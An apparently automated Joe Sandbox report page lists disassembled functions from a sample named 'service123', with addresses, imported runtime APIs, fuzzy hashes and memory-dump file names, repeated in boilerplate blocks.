Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e599097ff8fde5a58e760f6444ebe7d491dae0feeb58989c35c210d8376b9272
Instruction ID: dfc495046af4d60564eba8890992e06517bc994d85420ba7b86f1e74bb62c2f6
Opcode Fuzzy Hash: e599097ff8fde5a58e760f6444ebe7d491dae0feeb58989c35c210d8376b9272
Instruction Fuzzy Hash: 8C41BDB1A022148FCF00DF69D8917E9BBF5BF49348F18866AE958DF782D33594418F61

Function 6C38D370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C38CD00: strlen.MSVCRT ref: 6C38CD7D

Sleep.KERNEL32 ref: 6C38D4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: bb7213938fe9b6c4fcf52c3ad580e42136ac366d726a7411ed5e0385ed6370e1
Instruction ID: 6ef47c42d8a2a68a4a7d4c57c606c3a1def7a8c08ba19f22fe9f2f7270b4d23a
Opcode Fuzzy Hash: bb7213938fe9b6c4fcf52c3ad580e42136ac366d726a7411ed5e0385ed6370e1
Instruction Fuzzy Hash: 5951CCA020D3C1CAEB21EBBAA4457497FF45757308F084559C7884B68FD3BA9509CB6A

Function 6C38D570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 22fe4baec5e1061193d1dac855af0e452205fac36f8058df3cf8af4618137e6f
Instruction ID: 01cffa287161037d6409d92d8689c2e1b42a30eff66d87d19199de209345bee4
Opcode Fuzzy Hash: 22fe4baec5e1061193d1dac855af0e452205fac36f8058df3cf8af4618137e6f
Instruction Fuzzy Hash: 4431B57060A3069FE320DF69D480B6AF7E4EBC5318F54892FE59897B45E335D4588F82

Function 6C38D67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: ecadb6c6a048f1f6d0235afb3655aeb99ffa3ac1d6411529ce5c1947b2782ecb
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: 9EB0922088E2208A44206EA404408AAF2289B033487006C00429A33E011A00A409885A

Function 6C38D6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6ae9f1a81c80a08ff3c3f4c5e8e1741abc20f92220a49fe921a2bf23c40049ca
Instruction ID: 2d5ccefd16d2e8b6675684c7562539559f7878d2cd7ba8ecb4cb389b2d7996fc
Opcode Fuzzy Hash: 6ae9f1a81c80a08ff3c3f4c5e8e1741abc20f92220a49fe921a2bf23c40049ca
Instruction Fuzzy Hash: 32414870A0A3028FE710DF19D580B5ABBE1EF89708F508D2EE598C7B51D376D9488F92

Function 6C38D855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a68eedaa1cba4ce4268dd238fddfc89f073459649134498b7a606d33d1eb15d7
Instruction ID: 0696120d2e865beef5dd10c8a679a665ead259b16b750cfd06d2943ac14a98a9
Opcode Fuzzy Hash: a68eedaa1cba4ce4268dd238fddfc89f073459649134498b7a606d33d1eb15d7
Instruction Fuzzy Hash: F5E0657190D2574FE720EE68D08076A7BA1AB4230CF941C58C69527A46C365A45ECB46

Function 6C39C0E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C39C151
fwrite.MSVCRT ref: 6C39C1F8
fputs.MSVCRT ref: 6C39C215
fwrite.MSVCRT ref: 6C39C23E
fputs.MSVCRT ref: 6C39C25D
fwrite.MSVCRT ref: 6C39C28C
fwrite.MSVCRT ref: 6C39C2BE
abort.MSVCRT ref: 6C39C2C3
abort.MSVCRT ref: 6C456157
free.MSVCRT ref: 6C45615F

Part of subcall function 6C38A340: strlen.MSVCRT ref: 6C38A3C5
Part of subcall function 6C38A340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C39C1CC), ref: 6C38A3E0
Part of subcall function 6C38A340: free.MSVCRT ref: 6C38A3EA

Strings

-, xrefs: 6C39C271
terminate called after throwing an instance of ', xrefs: 6C39C1F1
terminate called without an active exception, xrefs: 6C39C285
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C39C0F9

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 75f891fbe88335f35438807f0c6d63f068d592cb27f32f47c5c519cbdc8ece7d
Instruction ID: c05ea4212b6b6c9ec30a136c9522c9725527df5076004e23e188ba62aadd8c2e
Opcode Fuzzy Hash: 75f891fbe88335f35438807f0c6d63f068d592cb27f32f47c5c519cbdc8ece7d
Instruction Fuzzy Hash: AF5104B09083149FDB00EF65C489B9AFBE4AF85318F40891DE4D98B745EB799489CF93

Function 6C38D8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 75e568d1ae32d6a8d3db3ceb21d541cfd4c98b87cd9c99883f6f4b62d5e96d12
Instruction ID: 7542dc34ae691feb8732823859dbd3cb091a5f63b9e29a0bf86f3a6908e6373b
Opcode Fuzzy Hash: 75e568d1ae32d6a8d3db3ceb21d541cfd4c98b87cd9c99883f6f4b62d5e96d12
Instruction Fuzzy Hash: 21F0A7B0A693464FD720DF28C481B66BBA4BB43315F881C85D9845BB43D33994ACCFA1

Function 6C38DE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C38DEB8

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 12f71c60acc3c2facf97e0b66c0453d11b8b87f0883809e34989feaad3c6b2f7
Instruction ID: 52def2718ce20d37d519fc744d0cd55f72413c4db3c2b71d48c74d0ee3dc9226
Opcode Fuzzy Hash: 12f71c60acc3c2facf97e0b66c0453d11b8b87f0883809e34989feaad3c6b2f7
Instruction Fuzzy Hash: 8E21967050625ECBDB20DF54DC84BD9B7B8AB46319F1045A7D948AB710E731AA888F91

Function 6C38DA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 2f9014584ce49b83ebf412398287acf595a0b5d0e3d71cfa834283a912b2e016
Instruction ID: a81dce42a762b47fc545e805c4c48d6fb8bd6fd30a78f8be5a93e831ae9ff212
Opcode Fuzzy Hash: 2f9014584ce49b83ebf412398287acf595a0b5d0e3d71cfa834283a912b2e016
Instruction Fuzzy Hash: C0413C74A052199FCF10DF54C880BDEB7B1EF89318F1489AAD949A7701D734AE88CF91

Function 6C38DCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 88c782a403846ed723a1f8ff2107681698e8ce5c5db16c8fa87ff71a60714a4f
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 061149749052199BCF14DF64C8809DEB7B5EF85318F148969E84D6BB00EB30AE49CFE1

Function 6C38DD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction ID: 2be458047c331e9d532762fcd2c5ea551804c1f3b33be76e4b636db486187ed9
Opcode Fuzzy Hash: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction Fuzzy Hash: 72211774A0521EABCF10DF64C8809DEF7B5EF89308F1088A9D94967741EB30AE49CF91

Function 6C390310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C45370F), ref: 6C39034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C45370F), ref: 6C390352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C45370F), ref: 6C390360

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 52fc6e3ef3dd36abcb6aa2197a33369879354b22dc268f3c8aeb8bfe0301c06c
Instruction ID: 465b052301b175339c2e851669529153e3232130b7a9acc33f1a0135cc0ee3f0
Opcode Fuzzy Hash: 52fc6e3ef3dd36abcb6aa2197a33369879354b22dc268f3c8aeb8bfe0301c06c
Instruction Fuzzy Hash: 7E5147716093418FCB10EF69D5C461EBBF5BB8A308F55492CD9988B714EB32E849CF92

Function 00CB1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00CB196F
vfprintf.MSVCRT ref: 00CB198F
abort.MSVCRT ref: 00CB1994
VirtualQuery.KERNEL32 ref: 00CB1A2B

Strings

Mingw-w64 runtime failure:, xrefs: 00CB1968
Address %p has no image-section, xrefs: 00CB1AEB
VirtualQuery failed for %d bytes at address %p, xrefs: 00CB1AD7
VirtualProtect failed with code 0x%x, xrefs: 00CB1AA6

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: c99188339980f228a7364eb99f270a1a52cf546e3d01b2c7996a3abd1fecdf40
Instruction ID: e9b93a678a879a492e8b80da9eccb7c00f4738532f486f39b4e99b5c40957fb3
Opcode Fuzzy Hash: c99188339980f228a7364eb99f270a1a52cf546e3d01b2c7996a3abd1fecdf40
Instruction Fuzzy Hash: 62518CB19083008FC710EF29E88579EFBE4FF84350F598A1DE8999B211E734E945DB92

Function 6C38A690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C38A6BF
vfprintf.MSVCRT ref: 6C38A6DF
abort.MSVCRT ref: 6C38A6E4
VirtualQuery.KERNEL32 ref: 6C38A77B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6C38A827
VirtualProtect failed with code 0x%x, xrefs: 6C38A7F6
Address %p has no image-section, xrefs: 6C38A83B
Mingw-w64 runtime failure:, xrefs: 6C38A6B8

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
